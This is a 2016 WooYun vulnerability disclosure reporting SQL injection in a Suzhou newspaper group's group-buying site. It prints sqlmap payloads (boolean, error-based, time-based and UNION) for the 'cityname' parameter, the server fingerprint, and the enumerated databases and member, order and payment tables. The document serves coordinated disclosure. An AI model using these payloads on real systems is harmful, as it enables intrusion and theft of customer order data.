当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169210

漏洞标题:某团购站SQL注入 泄露订单信息

相关厂商:苏州日报报业集团

漏洞作者: 蝶.!

提交时间:2016-01-17 22:30

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

苏州豹行天下电子商务有限公司是苏州日报报业集团全资子公司,成立于2010年,注册资金200万元。公司成立就创建了豹团网,是团购模式生活服务类网站,也是报业集团唯一大型电商平台。

详细说明:

注入点:http://**.**.**.**//index.php?m=Index&a=index&cityname=suzhou

---
Parameter: cityname (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: m=Index&a=index&cityname=-9529%00' OR 9145=9145#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: m=Index&a=index&cityname=suzhou%00' AND (SELECT 5114 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(5114=5114,1))),0x71766a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sQwW'='sQwW
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: m=Index&a=index&cityname=suzhou%00' AND (SELECT * FROM (SELECT(SLEEP(5)))frvr) AND 'bKGS'='bKGS
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: m=Index&a=index&cityname=suzhou%00' UNION ALL SELECT CONCAT(0x7171767a71,0x70796555514b6b555463766d4f6e5145444a6c645957714b655a66446a4c68564358615176747a47,0x71766a6a71),NULL-- -
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [12]:
[*] 0512bao
[*] information_schema
[*] monitor_db
[*] mysql
[*] pointshop_db
[*] pointshop_db_20150723
[*] pointshop_db_bak
[*] subaotuan_cui
[*] subaotuan_hx
[*] subaotuan_linux
[*] sz69333333_db
[*] szbt

漏洞证明:

web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: 0512bao
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| pre_ucenter_members               | 92498   |
| pre_ucenter_memberfields          | 92497   |
| pre_ucenter_mergemembers          | 50966   |
| pre_common_district               | 45051   |
| pre_common_member_count           | 17507   |
| pre_common_member_status          | 17507   |
| pre_common_member                 | 17506   |
| pre_common_member_field_home      | 13049   |
| pre_forum_statlog                 | 10601   |
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: subaotuan_cui
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| fanwe_payment_log                | 315921  |
| fanwe_group_bond                 | 265639  |
| fanwe_sms_send_log               | 259919  |
| fanwe_order_goods                | 198486  |
| fanwe_order                      | 197548  |
| fanwe_payment_money_log          | 145783  |
| fanwe_order_incharge             | 144277  |
| fanwe_send_list                  | 82702   |
| fanwe_user                       | 72702   |

修复方案:

版权声明:转载请注明来源 蝶.!@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-20 14:22

厂商回复:

CNVD确认未复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.

最新状态:

暂无